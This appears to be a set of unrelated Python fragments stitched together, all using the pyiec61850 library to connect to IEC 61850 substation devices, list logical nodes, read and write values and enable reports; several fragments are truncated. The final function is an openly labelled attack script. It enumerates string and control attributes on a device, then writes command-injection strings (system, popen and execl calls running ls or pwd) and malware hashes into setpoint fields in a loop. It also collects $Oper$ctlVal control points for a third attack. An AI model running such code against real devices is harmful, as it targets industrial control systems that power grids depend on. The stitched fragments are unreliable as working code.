def getLNlist_fromIED(ip): res_list = [] con = iec61850.IedConnection_create() error = iec61850.IedConnection_connect(con, ip, tcpPort) state = iec61850.IedConnection_getState(con) if (error == iec61850.IED_ERROR_OK): [deviceList, error] = iec61850.IedConnection_getLogicalDeviceList(con) device = iec61850.LinkedList_getNext(deviceList) size = iec61850.LinkedList_size(deviceList) while device: #Iterate over each device from deviceList [logicalNodes, error] = iec61850.IedConnection_getLogicalDeviceDirectory( con, iec61850.toCharP(device.data)) lnode = iec61850.LinkedList_getNext(logicalNodes) while lnode: #Iterate over each node from LNodeList LN_name = iec61850.toCharP(lnode.data) res_list.append(LN_name) lnode = iec61850.LinkedList_getNext(lnode) iec61850.LinkedList_destroy(logicalNodes) device = iec61850.LinkedList_getNext(device) iec61850.LinkedList_destroy(deviceList) iec61850.IedConnection_close(con) else: print("Connection error") sys.exit(-1) iec61850.IedConnection_destroy(con) return res_list
def testClient(): con = iec61850.IedConnection_create() error = iec61850.IedConnection_connect(con, "localhost", tcpPort) if (error == iec61850.IED_ERROR_OK): # Accessing to SAV values theVal = "testmodelSENSORS/TTMP1.TmpSv.instMag.f" theValType = iec61850.IEC61850_FC_MX temperatureValue = iec61850.IedConnection_readFloatValue( con, theVal, theValType) assert (temperatureValue[1] == 0) newValue = temperatureValue[0] + 10 err = iec61850.IedConnection_writeFloatValue(con, theVal, theValType, newValue) assert (err == 21) # Accessing to ASG values theVal = "testmodelSENSORS/TTMP1.TmpSp.setMag.f" theValType = iec61850.IEC61850_FC_SP temperatureSetpoint = iec61850.IedConnection_readFloatValue( con, theVal, theValType) print(temperatureSetpoint) assert (temperatureValue[1] == 0) newValue = temperatureValue[0] + 10 err = iec61850.IedConnection_writeFloatValue(con, theVal, theValType, newValue) assert (err == 0) temperatureSetpoint = iec61850.IedConnection_readFloatValue( con, theVal, theValType) print(temperatureSetpoint) assert (temperatureSetpoint[0] == newValue) iec61850.IedConnection_close(con) else: print("Connection error") sys.exit(-1) iec61850.IedConnection_destroy(con) print("client ok")
def run_client(ip, dt, var): print(ip, dt, var) con = iec61850.IedConnection_create() timeout = iec61850.IedConnection_setConnectTimeout(con, 2000) error = iec61850.IedConnection_connect(con, ip, tcpPort) state = iec61850.IedConnection_getState(con) if (error == iec61850.IED_ERROR_OK and state): print("Good connection") if dt == 'b': [booleanValue, error] = iec61850.IedConnection_readBooleanValue( con, var, iec61850.IEC61850_FC_ST) print("booleanValue: ", booleanValue) elif dt == 'f': [analogValue, error ] = iec61850.IedConnection_readFloatValue(con, var, iec61850.IEC61850_FC_MX) print("Analog Value: ", analogValue) elif dt == 't': time = iec61850.Timestamp() [timeStampValue, error] = iec61850.IedConnection_readTimestampValue( con, var, iec61850.IEC61850_FC_MX, time) print("timeStampValue: ", iec61850.Timestamp_getTimeInSeconds(time)) elif dt == 'q': [qualityValue, error] = iec61850.IedConnection_readQualityValue( con, var, iec61850.IEC61850_FC_MX) print("qualityValue: ", qualityValue) else: print("Connection error status") sys.exit(-1) iec61850.IedConnection_destroy(con) print("Client OK")
def __init__(self, ip='127.0.0.1', tcpPort=102): try: self.__con = iec61850.IedConnection_create() self.__timeout = iec61850.IedConnection_setConnectTimeout( self.__con, 2000) self.__error = iec61850.IedConnection_connect( self.__con, ip, tcpPort) if (self.__error == iec61850.IED_ERROR_OK): running = 1 else: print("ошибка", self.__error) except Exception as e: print('Connection exception: ', str(e))
def main(): con = iec61850.IedConnection_create() err = iec61850.IedConnection_connect(con, "192.168.1.41", 102) [deviceList, err] = iec61850.IedConnection_getLogicalDeviceList(con) device = iec61850.LinkedList_getNext(deviceList) while device: print("LD: {}".format(iec61850.toCharP(device.data))) [LN, err] = iec61850.IedConnection_getLogicalDeviceDirectory( con, iec61850.toCharP(device.data)) device = iec61850.LinkedList_getNext(device) iec61850.LinkedList_destroy(deviceList)
def checkConnected(ip): try: con = iec61850.IedConnection_create() error = iec61850.IedConnection_connect(con, ip, tcpPort) state = iec61850.IedConnection_getState(con) if (error == iec61850.IED_ERROR_OK): iec61850.IedConnection_destroy(con) return True else: iec61850.IedConnection_destroy(con) return False except Exception: print("Connection error") sys.exit(-1) iec61850.IedConnection_destroy(con)
def install_handler1(self): print("Start") hostname = "localhost" tcpPort = 102 con = iec61850.IedConnection_create() error = iec61850.IedConnection_connect(con, hostname, tcpPort) print(str(error)) CB_PROTO = CFUNCTYPE(None, c_void_p, c_void_p) cbinst = CB_PROTO(self.func_handler) val = c_int() api = CDLL("/home/ivan/Projects/libiec61850/build/src/libiec61850.so") ReportHandler = api.IedConnection_installReportHandlerAddr ReportHandler.argtypes = [ c_uint, c_char_p, c_char_p, CB_PROTO, c_void_p ] ReportHandler.restype = None addr = iec61850.IedConnection_ToAddress(con) rcb, error = iec61850.IedConnection_getRCBValues( con, "TEMPLATELD0/LLN0.BR.brcbST0101", None) print("RCB:" + str(rcb)) rid = iec61850.ClientReportControlBlock_getRptId(rcb) print("OriginalID: " + rid) rptRef = create_string_buffer(b"TEMPLATELD0/LLN0.BR.brcbST0101") rptID = create_string_buffer(b"TEMPLATELD0/LLN0$BR$brcbST0101") ReportHandler(addr, rptRef, rptID, cbinst, None) print("Enabled " + str(iec61850.ClientReportControlBlock_getRptEna(rcb))) iec61850.ClientReportControlBlock_setTrgOps( rcb, iec61850.TRG_OPT_DATA_UPDATE | iec61850.TRG_OPT_GI) iec61850.ClientReportControlBlock_setRptEna(rcb, True) error = iec61850.IedConnection_setRCBValues( con, rcb, iec61850.RCB_ELEMENT_RPT_ENA | iec61850.RCB_ELEMENT_TRG_OPS, True) print(error) if (error == iec61850.IED_ERROR_OK): print("Connection is OK") else: print("Connection error status") print("Enabled " + str(iec61850.ClientReportControlBlock_getRptEna(rcb))) input("Wait input ... ") iec61850.IedConnection_close(con) iec61850.IedConnection_destroy(con)
def run(self): self.logger.debug("trying to connect...") try: self._con = iec61850.IedConnection_create() self._timeout = iec61850.IedConnection_setConnectTimeout( self._con, 2000 ) self._error = iec61850.IedConnection_connect( self._con, self._ip, self._tcp_port ) if(self._error == iec61850.IED_ERROR_OK): self.logger.debug("connection established") else: self.logger.debug("no connection") except Exception as e: self.logger.debug("problem with connection %s", e)
sys.path.insert(0, "libiec61850/pyiec61850") import iec61850 from datetime import datetime def signal_handler(signal, frame): global running running =0 print('You pressed Ctrl+C!') if __name__=="__main__": now = datetime.now(); current_time = now.strftime("%H:%M:%S"); print("Starting Client At Time %s" % current_time); #Create Client Connection con = iec61850.IedConnection_create() error = iec61850.IedConnection_connect(con, "localhost", 8102); if (error == iec61850.IED_ERROR_OK): [deviceList, error] = iec61850.IedConnection_getLogicalDeviceList(con) device = iec61850.LinkedList_getNext(deviceList) print("Connected to Server.\n") #Show Logical Node, Logical Device and Data Object inside the Server while device: LD_name=iec61850.toCharP(device.data) print("LD: %s" % LD_name) [logicalNodes, error] = iec61850.IedConnection_getLogicalDeviceDirectory(con, LD_name) logicalNode = iec61850.LinkedList_getNext(logicalNodes) while logicalNode:
def main(host,port,attack,it,con): attack12 =[] visable_string_type =['$NamPlt','$NamPlt$d','$NamPlt$IdNs','$NamPlt$swRev','$NamPlt$vendor','LogRef','DatSet','RptID'] attack3 =[] commands= [ 'return execl (\"/bin/pwd\", \"pwd\", NULL);', 'system((\"/bin/pwd\", \"pwd\", NULL);', 'popen((\"/bin/pwd\", \"pwd\", NULL);', 'fp = popen(\"/bin/ls /etc/\", \"r\");printf(\'%s\',fp);', 'fp = system(\'ls\');printf(\'%s\',fp);', 'sshell ss; ss.argv.insert(\"ls\");o_(ss.link);', 'CALL \"SYSTEM\" USING BY CONTENT \"ls\"', 'Run(@ComSpec & \" /c \" & \'pause\', \"\", @SW_HIDE)', 'system(\"pause\");', 'execute_process(COMMAND ls)', 'spawn,\"ls\",result', 'System runCommand(\"ls\") stdout println', 'var sh = new ActiveXObject(\"WScript.Sh\");sh.run(\"/c ls\");', '\"ls\" system.', 'run(\`ls\`)', 'r: 4:\"ls\"', '> (io:format (os:cmd \"ls -alrt\"))', 'drive1$ = left$(Drives$,1) run \"ls /\";drive1$;\"', 'print first butfirst shell [ls -a] ; ..', 'contents=$(shell cat foo) curdir=\`pwd\`'] #https://rosettacode.org/wiki/Execute_a_system_command malware_examples=[ '414af3620d0843f07318a2a33f65667d', '0c8b4b357d4f059177ee752a2a3230a5', 'f16ea91bb744e4abf5b0424e2a7d9246', '902d64217c8a0968a7b24af3001abba5', 'e19167569032677bb8b8a8ce78af11f8', 'a787ba60426e50c77ac8cb0598b634af', 'b6c26bbaefdbabedfd71b537b1cd7586', 'cbf48f823c965b40b3cb1c31c9c51bf6', '465c25e393f2e15e337ce5ef817c839e', '7209054e29ea7ebfe0828b11609f0db0', '9f0bf21fd75f540dce7fc29da799cbe1', 'f4ecba48d00f3e86b7ff72bfccc03410', '417f692bf04685b1e282f2ea8d8933bb', '16ee94648fdb34280c838e522292070f', 'fe59c96c664cf49a857469fa4a37f646', '5fb781ff11297732851186f3f7ac4b6a', 'bf134af3a00189da424657a382913da5', '75b50a3fae06f054cf3f28d80cfa4e15', '71db409e39688340d0dffff94a012e2e', '3b3eaf98db1df32147aadccf66826025', '0199d9d68ec0af5819d6137feb04310e'] #Create Client Connection con = iec61850.IedConnection_create() error = iec61850.IedConnection_connect(con, host,port); if (error == iec61850.IED_ERROR_OK): [deviceList, error] = iec61850.IedConnection_getLogicalDeviceList(con) device = iec61850.LinkedList_getNext(deviceList) print("Connected to Server.\n") #Show Logical Node, Logical Device and Data Object inside the Server while device: logical_device=iec61850.toCharP(device.data) print("Name of Logical Device: %s" % logical_device) [logicalNodes, error] = iec61850.IedConnection_getLogicalDeviceDirectory(con, logical_device) logicalNode = iec61850.LinkedList_getNext(logicalNodes) while logicalNode: LN_name=iec61850.toCharP(logicalNode.data) #print(" LN: %s" % LN_name) [LNobjects, error] = iec61850.IedConnection_getLogicalNodeVariables(con, logical_device+"/"+LN_name) LNobject = iec61850.LinkedList_getNext(LNobjects) while LNobject: #print(" DO: %s" % iec61850.toCharP(LNobject.data)) LNobject = iec61850.LinkedList_getNext(LNobject) try: #Attack1 and Attack2 if attack == 1 or attack == 2: for i in visable_string_type: if(str(iec61850.toCharP(LNobject.data)).endswith(i)): attack12.append(str(iec61850.toCharP(LNobject.data))) print(str(iec61850.toCharP(LNobject.data))) #Attack3 if attack == 3: if str(iec61850.toCharP(LNobject.data)).endswith('$Oper$ctlVal'): attack3.append(str(iec61850.toCharP(LNobject.data))) print(str(iec61850.toCharP(LNobject.data))) except (TypeError, AttributeError): pass iec61850.LinkedList_destroy(LNobjects) logicalNode = iec61850.LinkedList_getNext(logicalNode) iec61850.LinkedList_destroy(logicalNodes) device = iec61850.LinkedList_getNext(device) iec61850.LinkedList_destroy(deviceList) running = 1; signal.signal(signal.SIGINT, signal_handler); sp=[] ps_r=[] sp_w =[] while running: if attack == 1: count = 0 while count < it: count+=1 k = 0 for item in attack12: lln_param = logical_device+"/"+item type = iec61850.IEC61850_FC_SP #Function Code - Setpoint for c in commands: sp_w = iec61850.IedConnection_writeVisibleStringValue(con, lln_param, type, c) print(k,"- Working:",lln_param,c) time.sleep(0.1) k+=1 print("Finished Example Attack 1 - Command Injection") print("Attacked parameters:\n", attack12) break if attack == 2: count = 0 while count < it: count+=1 k = 0 for item in attack12: lln_param = logical_device+"/"+item type = iec61850.IEC61850_FC_SP #Function Code - Setpoint for m in malware_examples: sp_w = iec61850.IedConnection_writeVisibleStringValue(con, lln_param, type, m) print(k,"- Working:",lln_param,m) time.sleep(0.1) k+=1 print("Finished Example Attack 2 - Malware Injection") print("Attacked parameters:\n", attack12) break #MMS Structure if attack == 3: print("attack 3 ................") print(attack3) break